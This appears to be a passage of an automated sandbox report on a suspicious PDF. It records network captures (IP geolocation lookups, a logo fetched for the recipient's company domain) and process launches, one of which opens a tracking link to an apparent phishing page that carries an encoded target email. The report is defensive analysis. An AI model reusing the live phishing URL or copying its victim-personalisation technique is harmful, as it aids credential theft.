                                                                                        Accept: */*
                                                                                        Origin: https://lotadmin.in
                                                                                        Sec-Fetch-Site: cross-site
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Referer: https://lotadmin.in/
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:12 UTC973INHTTP/1.1 200 OK
                                                                                        Date: Mon, 09 Dec 2024 16:47:12 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 764
                                                                                        Connection: close
                                                                                        Allow: POST, GET, HEAD, OPTIONS, OPTIONS
                                                                                        X-Frame-Options: DENY
                                                                                        Vary: Host, origin
                                                                                        access-control-allow-origin: https://lotadmin.in
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: same-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DBMf2HEZ2WP9ZQdynusnFmUbLE3AAsafExti2aN%2B%2By%2B9Sc2sq%2BEaQPsuJ9Zw7Zus4rJEytRKD3pqPNvodE%2BUddnJy8ped52DZZ5nRxxIV3Ui2c84UOL8Y0rP"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ef679c3bc1f7c9a-EWR
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=4500&min_rtt=1957&rtt_var=5633&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2790&recv_bytes=1115&delivery_rate=1448412&cwnd=181&unsent_bytes=0&cid=21870ff44f4c6d2f&ts=800&x=0"
                                                                                        2024-12-09 16:47:12 UTC396INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 4e 59 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75
                                                                                        Data Ascii: { "ip": "8.46.123.228", "network": "8.46.123.0/24", "version": "IPv4", "city": "New York City", "region": "New York", "region_code": "NY", "country": "US", "country_name": "United States", "country_code": "US", "cou
                                                                                        2024-12-09 16:47:12 UTC368INData Raw: 6f 73 74 61 6c 22 3a 20 22 31 30 30 36 39 22 2c 0a 20 20 20 20 22 6c 61 74 69 74 75 64 65 22 3a 20 34 30 2e 37 37 38 2c 0a 20 20 20 20 22 6c 6f 6e 67 69 74 75 64 65 22 3a 20 2d 37 33 2e 39 38 38 34 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 20 20 22 75 74 63 5f 6f 66 66 73 65 74 22 3a 20 22 2d 30 35 30 30 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 20 22 2b 31 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 22 3a 20 22 55 53 44 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 44 6f 6c 6c 61 72 22 2c 0a 20 20 20 20 22 6c 61 6e 67 75 61 67 65 73 22 3a 20 22 65 6e 2d 55 53 2c 65 73 2d 55 53 2c 68 61 77 2c 66 72
                                                                                        Data Ascii: ostal": "10069", "latitude": 40.778, "longitude": -73.9884, "timezone": "America/New_York", "utc_offset": "-0500", "country_calling_code": "+1", "currency": "USD", "currency_name": "Dollar", "languages": "en-US,es-US,haw,fr


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.54974892.249.45.1214438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:13 UTC346OUTGET /favicon.ico HTTP/1.1
                                                                                        Host: lotadmin.in
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:13 UTC629INHTTP/1.1 200 OK
                                                                                        Connection: close
                                                                                        cache-control: public, max-age=604800
                                                                                        expires: Mon, 16 Dec 2024 16:47:13 GMT
                                                                                        content-type: image/x-icon
                                                                                        last-modified: Tue, 22 Oct 2024 03:16:35 GMT
                                                                                        accept-ranges: bytes
                                                                                        content-length: 2367
                                                                                        date: Mon, 09 Dec 2024 16:47:13 GMT
                                                                                        server: LiteSpeed
                                                                                        platform: hostinger
                                                                                        strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                        x-xss-protection: 1; mode=block
                                                                                        x-content-type-options: nosniff
                                                                                        alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                        2024-12-09 16:47:13 UTC739INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 32 00 00 00 32 08 06 00 00 01 69 38 b8 27 00 00 00 19 74 45 58 74 53 6f 66 74 77 61 72 65 00 41 64 6f 62 65 20 49 6d 61 67 65 52 65 61 64 79 71 c9 65 3c 00 00 03 20 69 54 58 74 58 4d 4c 3a 63 6f 6d 2e 61 64 6f 62 65 2e 78 6d 70 00 00 00 00 00 3c 3f 78 70 61 63 6b 65 74 20 62 65 67 69 6e 3d 22 ef bb bf 22 20 69 64 3d 22 57 35 4d 30 4d 70 43 65 68 69 48 7a 72 65 53 7a 4e 54 63 7a 6b 63 39 64 22 3f 3e 20 3c 78 3a 78 6d 70 6d 65 74 61 20 78 6d 6c 6e 73 3a 78 3d 22 61 64 6f 62 65 3a 6e 73 3a 6d 65 74 61 2f 22 20 78 3a 78 6d 70 74 6b 3d 22 41 64 6f 62 65 20 58 4d 50 20 43 6f 72 65 20 35 2e 30 2d 63 30 36 30 20 36 31 2e 31 33 34 37 37 37 2c 20 32 30 31 30 2f 30 32 2f 31 32 2d 31 37 3a 33 32 3a 30 30 20 20
                                                                                        Data Ascii: PNGIHDR22i8'tEXtSoftwareAdobe ImageReadyqe< iTXtXML:com.adobe.xmp<?xpacket begin="" id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.0-c060 61.134777, 2010/02/12-17:32:00
                                                                                        2024-12-09 16:47:13 UTC1628INData Raw: 37 39 34 30 44 45 44 36 45 36 33 39 46 22 20 73 74 52 65 66 3a 64 6f 63 75 6d 65 6e 74 49 44 3d 22 78 6d 70 2e 64 69 64 3a 41 46 33 32 41 34 46 30 32 38 33 38 31 31 45 39 38 46 41 37 39 34 30 44 45 44 36 45 36 33 39 46 22 2f 3e 20 3c 2f 72 64 66 3a 44 65 73 63 72 69 70 74 69 6f 6e 3e 20 3c 2f 72 64 66 3a 52 44 46 3e 20 3c 2f 78 3a 78 6d 70 6d 65 74 61 3e 20 3c 3f 78 70 61 63 6b 65 74 20 65 6e 64 3d 22 72 22 3f 3e 42 5c 67 6a 00 00 05 b5 49 44 41 54 78 da 62 f8 ff ff 3f 03 12 4e 43 e6 33 82 08 20 00 13 68 80 91 09 44 56 9c 03 b2 16 23 44 ef 7d 81 ca 82 b5 2f 46 e8 54 e2 61 60 d8 ed 0a a6 2b 99 d0 cd ba 1b 08 67 76 c0 2c df fa 1f 13 c0 1d 84 15 00 04 10 03 9a 57 0c 60 6c 16 98 3c 36 2f fc 47 76 3e 94 fd 1f a6 83 c1 75 0f 03 83 b1 10 42 01 5c 22 4d 95 81 21
                                                                                        Data Ascii: 7940DED6E639F" stRef:documentID="xmp.did:AF32A4F0283811E98FA7940DED6E639F"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>B\gjIDATxb?NC3 hDV#D}/FTa`+gv,W`l<6/Gv>uB\"M!


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.54974713.227.8.724438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:13 UTC367OUTGET /cherokeebrick.com?size=400 HTTP/1.1
                                                                                        Host: logo.clearbit.com
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:14 UTC555INHTTP/1.1 200 OK
                                                                                        Content-Type: image/png
                                                                                        Transfer-Encoding: chunked
                                                                                        Connection: close
                                                                                        access-control-allow-origin: *
                                                                                        Cache-Control: public, max-age=2592000
                                                                                        Date: Mon, 09 Dec 2024 16:47:10 GMT
                                                                                        x-envoy-response-flags: -
                                                                                        Server: Clearbit
                                                                                        strict-transport-security: max-age=63072000; includeSubDomains; preload
                                                                                        x-content-type-options: nosniff
                                                                                        X-Cache: Hit from cloudfront
                                                                                        Via: 1.1 7fda98e0b7fb99462a217f88a39fb70a.cloudfront.net (CloudFront)
                                                                                        X-Amz-Cf-Pop: BAH53-C1
                                                                                        X-Amz-Cf-Id: tk0oaUa9if0Jc8WB4PtH9f63_cDvYaDmZkv-XzIBHUFGFrxj_S8qog==
                                                                                        Age: 2
                                                                                        2024-12-09 16:47:14 UTC15829INData Raw: 34 61 65 65 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 c8 00 00 00 c8 08 02 00 00 00 22 3a 39 c9 00 00 4f 79 49 44 41 54 78 9c ec 7d 77 54 14 49 d7 f7 e4 21 07 c9 02 82 24 11 01 49 26 30 a0 a8 98 01 15 4c 8b 89 55 30 ae 11 c5 45 51 c4 b4 ca 1a d6 2c 06 c4 2c 82 a0 88 0a a8 64 14 10 15 51 24 e7 30 e4 38 a1 27 7c e7 f3 9e b7 4e bf 83 8f ef 2e c1 c1 67 e7 f7 07 67 e8 e9 a9 ae ee fa f5 ad 5b b7 6e a0 08 04 02 82 18 62 f4 36 48 a2 ee 80 18 ff 9d 10 13 4b 8c 3e 81 98 58 62 f4 09 c4 c4 12 a3 4f 20 26 96 18 7d 02 31 b1 c4 e8 13 88 89 25 46 9f 40 4c 2c 31 fa 04 62 62 89 d1 27 10 13 4b 8c 3e 81 98 58 62 f4 09 c4 c4 12 a3 4f 20 26 96 18 7d 02 31 b1 c4 e8 13 88 89 25 46 9f 40 4c 2c 31 fa 04 62 62 89 d1 27 10 13 4b 8c 3e 81 98 58 62 f4 09 c4 c4 12
                                                                                        Data Ascii: 4aeePNGIHDR":9OyIDATx}wTI!$I&0LU0EQ,,dQ$08'|N.gg[nb6HK>XbO &}1%F@L,1bb'K>XbO &}1%F@L,1bb'K>Xb
                                                                                        2024-12-09 16:47:14 UTC3361INData Raw: c0 32 d7 5b 17 ed 06 44 59 af 10 3e a0 0c 0e 47 8f 1e 9d 3c 79 32 92 64 68 27 a4 87 d5 50 fe 13 a0 7d 24 b1 90 34 4a 4b 4b 03 bf 03 3e 9f 9f 95 95 65 68 68 a8 a4 a4 94 98 98 88 97 01 a1 a1 a1 44 22 71 e5 ca 95 5c 2e 57 42 42 62 ee dc b9 9d 9d 9d a1 a1 a1 af 5f bf 16 a2 11 9c df 47 db 76 e8 25 9c 33 67 ce de bd 7b d1 ab d8 75 3b eb c7 43 94 53 21 ca 67 07 0f 08 c3 30 43 43 c3 47 8f 1e a1 7a 32 7d b1 cb 86 c4 95 d0 73 c7 13 1d 75 00 c3 b0 7b f7 ee 65 67 67 0b d1 05 3c ca 23 23 23 f9 7c fe bb 77 ef 0a 0a 0a 84 ae c2 66 b3 a1 7d 44 d9 de bd 05 7c e7 e3 e2 e2 74 75 75 41 f0 83 8e 85 7f 27 7b f7 d2 7f 1f a2 24 96 90 37 12 9b cd be 7f ff be a9 a9 29 d2 21 50 a8 5d 2f be 7c 30 cc e8 12 f8 29 03 a6 12 bc 52 8c d2 93 e2 83 6a d0 b0 b1 bf 02 8e c3 87 6f be 0c bd 2e
                                                                                        Data Ascii: 2[DY>G<y2dh'P}$4JKK>ehhD"q\.WBBb_Gv%3g{u;CS!g0CCGz2}su{egg<###|wf}D|tuuA'{$7)!P]/|0)Rjo.
                                                                                        2024-12-09 16:47:14 UTC1227INData Raw: 34 63 34 0d 0a b4 cc 60 30 60 6b 1c 4e b8 77 ef 1e ac 10 67 cf 9e 2d 14 b1 83 4c a9 78 2e 02 7e fb ed 37 a4 8a a9 ab ab 37 34 34 a0 34 10 78 76 fe d4 f8 e9 89 85 00 fa 50 52 52 92 9e 9e 1e 72 2c a1 52 a9 bb 77 ef ee ea 39 18 1b 1b 8b 1c 4e 06 0d 1a e4 e4 e4 e4 e1 e1 01 8b 44 29 29 a9 a2 a2 22 c4 0f a0 cb ac 59 b3 a0 35 06 83 81 17 2a 2f 5e bc 00 ee 42 2e 53 a1 ed 73 bc 45 1e 1f 79 1b 1c 1c 0c ac 92 96 96 5e ba 74 69 53 53 13 9c d6 3f 5d f6 ba 87 ff 06 62 e1 77 e5 60 f2 ba 72 e5 ca 94 29 53 ec ec ec ba 4e 82 10 52 7c e0 c0 01 98 8f 94 95 95 f1 eb 38 3b 3b bb 84 84 04 a1 f6 99 4c a6 b3 b3 33 9c 03 75 e1 51 cc 60 5b 5b 1b ec cc 90 48 a4 b2 b2 32 3c e7 ee dc b9 e3 ea ea ba 68 d1 a2 ae eb 86 89 13 27 92 c9 64 53 53 53 58 07 20 e6 41 56 41 21 37 a1 9f 14 3f 3d
                                                                                        Data Ascii: 4c4`0`kNwg-Lx.~77444xvPRRr,Rw9ND))"Y5*/^B.SsEy^tiSS?]bw`r)SNR|8;;L3uQ`[[H2<h'dSSSX AVA!7?=
                                                                                        2024-12-09 16:47:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                        Data Ascii: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.549750104.26.8.444438168C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        2024-12-09 16:47:14 UTC337OUTGET /json/ HTTP/1.1
                                                                                        Host: ipapi.co
                                                                                        Connection: keep-alive
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                        Accept: */*
                                                                                        Sec-Fetch-Site: none
                                                                                        Sec-Fetch-Mode: cors
                                                                                        Sec-Fetch-Dest: empty
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                        2024-12-09 16:47:14 UTC924INHTTP/1.1 200 OK
                                                                                        Date: Mon, 09 Dec 2024 16:47:14 GMT
                                                                                        Content-Type: application/json
                                                                                        Content-Length: 764
                                                                                        Connection: close
                                                                                        Allow: HEAD, OPTIONS, GET, POST, OPTIONS
                                                                                        X-Frame-Options: DENY
                                                                                        Vary: Host, origin
                                                                                        X-Content-Type-Options: nosniff
                                                                                        Referrer-Policy: same-origin
                                                                                        Cross-Origin-Opener-Policy: same-origin
                                                                                        CF-Cache-Status: DYNAMIC
                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U2vpujDLqQmtIlaHfSiB3nw5QJj1XjOUKpI%2FGiH%2B50jyeIGkFhjr%2FJopF5EBH96f%2FDVbpdW3SIFuDDez%2F8AxvWGZcM%2FmFh5MfrJ7b8SdLfBAJJyZcZvvje1u"}],"group":"cf-nel","max_age":604800}
                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                        Server: cloudflare
                                                                                        CF-RAY: 8ef679d3bd23b9c5-EWR
                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=3204&min_rtt=1886&rtt_var=3156&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2790&recv_bytes=919&delivery_rate=1427872&cwnd=142&unsent_bytes=0&cid=64f6be56a341eeea&ts=774&x=0"
                                                                                        2024-12-09 16:47:14 UTC445INData Raw: 7b 0a 20 20 20 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 32 32 38 22 2c 0a 20 20 20 20 22 6e 65 74 77 6f 72 6b 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 30 2f 32 34 22 2c 0a 20 20 20 20 22 76 65 72 73 69 6f 6e 22 3a 20 22 49 50 76 34 22 2c 0a 20 20 20 20 22 63 69 74 79 22 3a 20 22 4e 65 77 20 59 6f 72 6b 20 43 69 74 79 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 4e 65 77 20 59 6f 72 6b 22 2c 0a 20 20 20 20 22 72 65 67 69 6f 6e 5f 63 6f 64 65 22 3a 20 22 4e 59 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 6e 61 6d 65 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 20 20 22 63 6f 75
                                                                                        Data Ascii: { "ip": "8.46.123.228", "network": "8.46.123.0/24", "version": "IPv4", "city": "New York City", "region": "New York", "region_code": "NY", "country": "US", "country_name": "United States", "country_code": "US", "cou
                                                                                        2024-12-09 16:47:14 UTC319INData Raw: 67 69 74 75 64 65 22 3a 20 2d 37 33 2e 39 38 38 34 2c 0a 20 20 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 0a 20 20 20 20 22 75 74 63 5f 6f 66 66 73 65 74 22 3a 20 22 2d 30 35 30 30 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 63 61 6c 6c 69 6e 67 5f 63 6f 64 65 22 3a 20 22 2b 31 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 22 3a 20 22 55 53 44 22 2c 0a 20 20 20 20 22 63 75 72 72 65 6e 63 79 5f 6e 61 6d 65 22 3a 20 22 44 6f 6c 6c 61 72 22 2c 0a 20 20 20 20 22 6c 61 6e 67 75 61 67 65 73 22 3a 20 22 65 6e 2d 55 53 2c 65 73 2d 55 53 2c 68 61 77 2c 66 72 22 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 61 72 65 61 22 3a 20 39 36 32 39 30 39 31 2e 30 2c 0a 20 20 20 20 22 63 6f 75 6e 74 72 79 5f 70 6f
                                                                                        Data Ascii: gitude": -73.9884, "timezone": "America/New_York", "utc_offset": "-0500", "country_calling_code": "+1", "currency": "USD", "currency_name": "Dollar", "languages": "en-US,es-US,haw,fr", "country_area": 9629091.0, "country_po


                                                                                        Click to jump to process

                                                                                        Click to jump to process

                                                                                        Click to dive into process behavior distribution

                                                                                        Click to jump to process

                                                                                        Target ID:0
                                                                                        Start time:11:46:53
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Employee_Letter.pdf"
                                                                                        Imagebase:0x7ff686a00000
                                                                                        File size:5'641'176 bytes
                                                                                        MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:11:46:53
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                                        Imagebase:0x7ff6413e0000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:11:46:54
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2072 --field-trial-handle=1544,i,8096113706356251709,14712202224613905127,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                                        Imagebase:0x7ff6413e0000
                                                                                        File size:3'581'912 bytes
                                                                                        MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:11:46:56
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://go.eu.sparkpostmail1.com/f/a/TeZdKDVSihVahrYyiCrP-Q~~/AAGCxAA~/RgRpNb0OP0QjaHR0cHM6Ly9sb3RhZG1pbi5pbi9kdWUvY2lnYW0vaW5kZXhXBXNwY2V1QgpnRA44U2evTxxnUhJ6YXJnYXJAZmFyaWRlYS5jb21YBAAAAAE~#cm9ubmllLnBhcnRyaWRnZUBjaGVyb2tlZWJyaWNrLmNvbQ==
                                                                                        Imagebase:0x7ff715980000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        Target ID:6
                                                                                        Start time:11:46:57
                                                                                        Start date:09/12/2024
                                                                                        Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2076 --field-trial-handle=1920,i,690903513133958984,11826020221324224109,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                        Imagebase:0x7ff715980000
                                                                                        File size:3'242'272 bytes
                                                                                        MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:false

                                                                                        No disassembly